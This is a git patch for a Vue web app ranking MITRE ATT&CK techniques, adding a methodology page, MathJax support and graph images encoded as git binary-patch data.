zR%Ob?*7PG!WoqX8owM_{%?#U1t`x>OR=(7@++*BAtb#WXKM>(+tg%Sc_Gbr+KD&O>P0MH)lO;ehvtu<>11pCJ!-U3#pb$9^D+W9&`c<-o|B*8?
zEnO3yk-My9x5nRFwlWaI)nF(-lPy2?X>U@jkMiS$Mn}PPjAz@$K5mXG{{h{rgB3_*
zZ@00bghD19Kja?YF>q^RM|~rGNBw_9zcb>-zGsn<#Gb%k5y76A51M81L;!lE
z*VN#C|vko;(!b8kxCl#=Vpg1Y*h|-(-qi3BfqK_4^{ghT?pg%
z%EPTJ_JO#%gdUpe9>WR5lxNwy8<7J>e?PbgFppBVbcZGsk`WC20*&M8xhRAgp(5r>
z(NhvXDLMmZRqcd>LR&rFY&2DO+yx$NQzJO4W8V0l(420;VN_dN6N}+qALpidAZ|mZC2oZ)}_}6fKkK#%@{9DDmUK)h5
z6W-Pf-=h{O44gxCkJiq9kfiLYut4o&F{-g}%a&(Zq$e0vZ{I4&ZNykzx$z){vo>?2
zd>h$RI!EY}$b@{IQ^}&}%mF=-_Q!SQp%6nqj;wqm)b8Z`T}nHz130O>f2&J(6yW;P
z`(3q^-_=a;JzMr)LjPa(##Rphl>7g4luQ4QU821I(NBCE3n*Z!Ck%w?d*ZBZn#oL!O5AoC*5nvtUD@xBN0?MTvDJOnf
zsKC+H0tQ-mWJe}do-YOSdD}rA-;Pxw?ae-FS)M36V`xF<;yF275{(qrm{AU1c>;4Z
zw}wl@k5eZd8^=#;!6*Gv5gQ`HSBUwSRH@r9c6fi6XR%8R#!*7#)eUt@?Ou=Zgyv!P
zXiA87J=dnR(skHY%ZDNF4cLD-*`=LCLDKhsK*2u+egA`ke^mc}F5f7y_?BQnY`f=P
z={f$&cx03cos-7iXa5P?fg>&{V>qTRWxnNAREz<^BPG1Wz!vPDvH;KG9tOd#0uPg)
zzd1D1{c`_M13F+}Xk!{?w(ScS?A&4DW!nfya=i^zQ6#}l5uMewbVh|3Lnn(cW>!E@
zl}Z)QEN@#yerT)|aPnfy@nlh1!X4J>0(SaS5cl3C+qaERFhU2M|Bjry(JQ=za(E>Z
z8g6wLV$cm6WNN9E=q}V0>Gf9i@o&W??sp*h|0fvyQ>6AkF!;YQ@V)&n80h~K29E!L
z!5HN?3?SQZ#O=ln#?(*M{{sem|A4_m@K$pvAuS#y_Hh~p8o9WV#Af%=$#eTR4Cai~
zq|CPczBP~LbKct)h4eQl%w?sd?A0Or9gF7}5lOhCDW^t7C>8Uyu9+2YjRX&k*1w!u
z*z}rN7C5mf_vXKc9QLwaR^M4(f^GIEk>lS{b2m~0ch$7FV2vwl=?De{ks_8BrIoJ0
z`R-pYyLP^N^?y}RbOadui243wYv1KxHJtzK4gSAA_hl8ugV4)}1YYGg8&7vUz02wg
zqj&%^$Qf2xzI01ZxJ3XdwMi{-q542GmCZZul$RNuZ?G6o=dxK!dQ~{oru6j
z=>O{D{6dH)QY7%h+O3|&s
z?yG7tY>s&v8$^KnVn(&Yy>kj6(6w?~J=C+TdnmnHuwhv5o9hR|QCJkVoiih(2X53b
z(z0y35_l&RDOH3
z`M+^eQ&p(O(~kqP7(5*su#ZBAatCx0BIRX~ZN&wiQYE8&KGkz+Jw)*x3^ql|;}R+5
zpp5di)Rj360eoMM8}!RoN-;Dwrh>Ep-f1S|kQCliM#`ZjCsKrL;v+&rJ1HP(bi@3=
z?AY`EyGy|>4)WLQro{qgJ?OPeHAPq3n+!b?zak|>UKulWC4`ivZN$UOVb51xfFfz-
z2Wu5+cDN3I*l(t15CSU#M;g`uvQ8d{XXf_Up=p4HA-Q%49_IWM*sd#G=IQP2jCIsn
z`}_95J_Zdv_)T5|paQ%TJu7Zp!!tGt!NBtu-c+{0#Z(P$iTP6$z(5)`Y4gtx^c$1e
zb!1z*3Q-<5ODWVL?92F%=dqt~Q67b2w&=?I)4xrVM*-`R22Pym+#KR>fJk
zKL#kJP3dT>(UeGBmW|>PUS>r6|AW0VmI50Chu35e4QvWw6OfR>{qAFh%h$Z{Bx~GhdeSVrx;@$XgFL
zbJk4ehyhsA#t_+%)6B}%0ym7nvMq)Pged}Pw&Wr%OvUmKMr~CnRS<(vpINf!Y0MIz!+6$Ir<|3)KNJV^JnMT(&dT5G
hiz7mwHG7R`nSTzj+^sqa%%6GSrEMhS({*!j^bcT*_rU-F


From 5a5460d01ca2512216d555a602c0c1a291bcbbeb Mon Sep 17 00:00:00 2001
From: Allison Robbins 
Date: Thu, 13 Jun 2024 15:09:17 -0400
Subject: [PATCH 13/21] TAT-125 create methodology page (#15)

* feat(TAT-125): swt up methodology page structure with container and sidebar

* feat(TAT-125): add text for actionability and choke point

* feat(TAT-125): add text for prevalence

* feat(TAT-125): use mathjax wrapper to convert latex expressions to html text

* feat(TAT-125): adding graph images to methodology pages, delete unnecessary images

* feat(TAT-125): add remaining methodology graphs

* feat(TAT-125): write good alt text for the graphs on methodology pages

* refactor(TAT-125): fix lint error

* feat(TAT-125): use emit instead of referencing parent methods in methodology page and calculator page

* feat(TAT-125): fix mixed content error

* refactor(TAT-125): fix mixed content error

* feat(TAT-125): use static mathjax wrapper instead of importing library

* feat(TAT-125): split methodology details code into dynamic components

* refactor(TAT-125): remove unnecessary code

* feat(TAT-125): upgrade to MathJax 3, typeset on mounted hook

---------

Co-authored-by: arobbins 
---
 index.html                                    |  25 +-
 package-lock.json                             |   6 +
 package.json                                  |   3 +-
 .../actionability_with_utility.png            | Bin 0 -> 247314 bytes
 .../actionability_without_utility.png         | Bin 0 -> 96082 bytes
 .../methodology/before_after_techniques.png   | Bin 0 -> 74989 bytes
 .../methodology/choke_point_failure.png       | Bin 0 -> 39659 bytes
 .../methodology/choke_point_success.png       | Bin 0 -> 157760 bytes
 .../methodology/chokepoint_with_utility.png   | Bin 0 -> 208068 bytes
 .../chokepoint_without_utility.png            | Bin 0 -> 248497 bytes
 src/assets/methodology/distribution.png       | Bin 0 -> 146523 bytes
 src/assets/methodology/figure1.png            | Bin 0 -> 105140 bytes
 src/assets/methodology/utility_examples.png   | Bin 0 -> 157366 bytes
 src/assets/methodology/weighting-examples.png | Bin 0 -> 76032 bytes
 src/assets/methodology/weighting_function.png | Bin 0 -> 35334 bytes
 src/components/ActionabilitySection.vue       | 265 ++++++++++++++++++
 src/components/ChokePointSection.vue          | 179 ++++++++++++
 src/components/MethodologySidebar.vue         |  49 ++++
 src/components/PrevalenceSection.vue          | 139 +++++++++
 src/components/TopTenSidebar.vue              |   5 +-
 src/views/MethodologyPage.vue                 |  70 ++++-
 src/views/TopTenResults.vue                   |  10 +-
 22 files changed, 735 insertions(+), 16 deletions(-)
 create mode 100644 src/assets/methodology/actionability_with_utility.png
 create mode 100644 src/assets/methodology/actionability_without_utility.png
 create mode 100644 src/assets/methodology/before_after_techniques.png
 create mode 100644 src/assets/methodology/choke_point_failure.png
 create mode 100644 src/assets/methodology/choke_point_success.png
 create mode 100644 src/assets/methodology/chokepoint_with_utility.png
 create mode 100644 src/assets/methodology/chokepoint_without_utility.png
 create mode 100644 src/assets/methodology/distribution.png
 create mode 100644 src/assets/methodology/figure1.png
 create mode 100644 src/assets/methodology/utility_examples.png
 create mode 100644 src/assets/methodology/weighting-examples.png
 create mode 100644 src/assets/methodology/weighting_function.png
 create mode 100644 src/components/ActionabilitySection.vue
 create mode 100644 src/components/ChokePointSection.vue
 create mode 100644 src/components/MethodologySidebar.vue
 create mode 100644 src/components/PrevalenceSection.vue

diff --git a/index.html b/index.html
index 9eaca24..b9373f2 100644
--- a/index.html
+++ b/index.html
@@ -14,7 +14,30 @@
       href="https://fonts.googleapis.com/css2?family=Fira+Sans+Extra+Condensed:ital,wght@0,100;0,200;0,300;0,400;0,500;0,600;0,700;0,800;0,900;1,100;1,200;1,300;1,400;1,500;1,600;1,700;1,800;1,900&display=swap"
       rel="stylesheet"
     />
-
+    
+    
+    
     Top ATT&CK Techniques
   
   
diff --git a/package-lock.json b/package-lock.json
index f4a62aa..98ab389 100644
--- a/package-lock.json
+++ b/package-lock.json
@@ -15,6 +15,7 @@
         "primeicons": "^7.0.0",
         "primevue": "^3.49.1",
         "vue": "^3.2.37",
+        "vue-mathjax-next": "^0.0.6",
         "vue-router": "^4.1.6"
       },
       "devDependencies": {
@@ -3998,6 +3999,11 @@
         "eslint": ">=6.0.0"
       }
     },
+    "node_modules/vue-mathjax-next": {
+      "version": "0.0.6",
+      "resolved": "https://registry.npmjs.org/vue-mathjax-next/-/vue-mathjax-next-0.0.6.tgz",
+      "integrity": "sha512-H4nZ8t31TmBJgiR6pHrOGz+RWhlw34d0yhD8fi8CnXoGOydGFreNH/Crd/9Jfd2IMSu/I0AC3ymT9D09JRMIrw=="
+    },
     "node_modules/vue-router": {
       "version": "4.1.6",
       "resolved": "https://registry.npmjs.org/vue-router/-/vue-router-4.1.6.tgz",
diff --git a/package.json b/package.json
index 63d8fda..ef7037a 100644
--- a/package.json
+++ b/package.json
@@ -11,13 +11,14 @@
     "update": "node ./scripts/update_techniques.js"
   },
   "dependencies": {
-    "exceljs": "^4.4.0",
     "downloadjs": "^1.4.7",
+    "exceljs": "^4.4.0",
     "marked": "^12.0.1",
     "pinia": "^2.0.29",
     "primeicons": "^7.0.0",
     "primevue": "^3.49.1",
     "vue": "^3.2.37",
+    "vue-mathjax-next": "^0.0.6",
     "vue-router": "^4.1.6"
   },
   "devDependencies": {
diff --git a/src/assets/methodology/actionability_with_utility.png b/src/assets/methodology/actionability_with_utility.png
new file mode 100644
index 0000000000000000000000000000000000000000..572cfec30f5172db0e2ce177fb64a5473e426cc5
GIT binary patch
literal 247314
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
